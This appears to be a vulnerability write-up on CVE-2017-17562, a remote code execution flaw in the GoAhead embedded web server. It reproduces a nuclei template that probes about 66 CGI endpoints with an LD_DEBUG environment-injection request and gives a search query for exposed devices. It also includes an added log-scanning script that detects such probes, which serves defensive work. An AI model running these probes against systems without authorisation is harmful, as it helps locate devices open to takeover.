Embedthis GoAhead Remote Code Execution Vulnerability

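Vulnerability Information

Vulnerability name: Embedthis GoAhead Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2017-17562

Vulnerability type: Command execution

Severity: High

Description: Embedthis GoAhead is a lightweight embedded web server, widely used in embedded devices and network applications to provide HTTP service. Because it is lightweight and performs well, GoAhead is common in IoT devices, routers, network cameras and similar devices. The vulnerability affects GoAhead versions before 3.6.5: when CGI is enabled and a CGI program is dynamically linked, an attacker can exploit it to execute code remotely. The technical root cause is that GoAhead does not properly validate and filter user input when handling CGI requests, so an attacker can craft special HTTP requests and use environment variable injection to execute arbitrary commands. The flaw lets an attacker execute code remotely without authentication, which can lead to full control of the server, data disclosure, service interruption and other serious consequences. Because CGI is widely used, the impact is broad, especially on systems that have not been updated promptly.

Vendor: embedthis

Product: goahead

Affected versions: <3.6.5

Search syntax: cpe:"cpe:2.3:a:embedthis:goahead"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fcves%2F2017%2FCVE-2017-17562.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details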


id: CVE-2017-17562

info:
  name: Embedthis GoAhead <3.6.5 - Remote Code Execution
  author: geeknik
  severity: high
  description: |
    description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability.
  reference:
    - https://www.elttam.com/blog/goahead/
    - https://github.com/ivanitlearning/CVE-2017-17562
    - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
    - https://github.com/embedthis/goahead/issues/249
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17562
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-17562
    cwe-id: CWE-20
    epss-score: 0.94053
    epss-percentile: 0.99889
    cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:*
  metadata:
    max-request: 66
    vendor: embedthis
    product: goahead
    shodan-query: cpe:"cpe:2.3:a:embedthis:goahead"
  tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /cgi-bin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "GoAhead"
          - "cgi-bin"
        condition: or
        internal: true

  - raw:
      - |
        GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    payloads:
      endpoint:
        - admin
        - apply
        - non-CA-rev
        - cgitest
        - checkCookie
        - check_user
        - chn/liveView
        - cht/liveView
        - cnswebserver
        - config
        - configure/set_link_neg
        - configure/swports_adjust
        - eng/liveView
        - firmware
        - getCheckCode
        - get_status
        - getmac
        - getparam
        - guest/Login
        - home
        - htmlmgr
        - index
        - index/login
        - jscript
        - kvm
        - liveView
        - login
        - login.asp
        - login/login
        - login/login-page
        - login_mgr
        - luci
        - main
        - main-cgi
        - manage/login
        - menu
        - mlogin
        - netbinary
        - nobody/Captcha
        - nobody/VerifyCode
        - normal_userLogin
        - otgw
        - page
        - rulectl
        - service
        - set_new_config
        - sl_webviewer
        - ssi
        - status
        - sysconf
        - systemutil
        - t/out
        - top
        - unauth
        - upload
        - variable
        - wanstatu
        - webcm
        - webmain
        - webproc
        - webscr
        - webviewLogin
        - webviewLogin_m64
        - webviewer
        - welcome
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "environment variable"
          - "display library search paths"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022006396398547fe6251be9f9ad3b5a79dbd265ed8a4c8b32d24c03d5aacf35a4e2022100fc566d2a84f1deba46338f94549ca5a367f43b041cf1237d13ac149402c4e8a6:922c64590222798bb761d5b6d8e72950
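
The probe in the template above leaves a recognizable trace on the server side: a request under /cgi-bin/ whose query string sets a dynamic-loader variable (a name starting with LD_). The following log check is an added example, not part of the nuclei template or the original page; the combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines in combined access-log format (assumed; adjust
# REQUEST_RE to the log format of the device or reverse proxy in use).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jul/2025:10:00:01 +0000] "GET /cgi-bin/index?LD_DEBUG=help HTTP/1.1" 200 1532',
    '192.0.2.10 - - [21/Jul/2025:10:00:02 +0000] "GET /cgi-bin/login?%4cD_DEBUG=help HTTP/1.1" 404 210',
    '198.51.100.7 - - [21/Jul/2025:10:00:05 +0000] "GET /cgi-bin/status?lang=en HTTP/1.1" 200 845',
    '198.51.100.7 - - [21/Jul/2025:10:00:09 +0000] "GET /index.html?LD_DEBUG=help HTTP/1.1" 200 99',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def loader_params(target):
    """Names of LD_* query parameters on a /cgi-bin/ request target, else []."""
    path, _, query = target.partition("?")
    if not unquote(path).startswith("/cgi-bin/"):
        return []
    # parse_qsl percent-decodes names, so %4cD_DEBUG is seen as LD_DEBUG.
    names = [name for name, _ in parse_qsl(query, keep_blank_values=True)]
    return [n for n in names if n.startswith("LD_")]


def scan(lines):
    """Return one finding per log line that carries a loader variable."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        params = loader_params(m.group("target"))
        if params:
            findings.append({
                "ip": m.group("ip"),
                "path": unquote(m.group("target").partition("?")[0]),
                "params": params,
                # The template above only reports a match on status 200.
                "status": int(m.group("status")),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
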


Embedthis GoAhead Remote Code Execution Vulnerability
http://example.com/2025/07/21/github_1069834761/
Author
lianccc
Published
July 21, 2025
License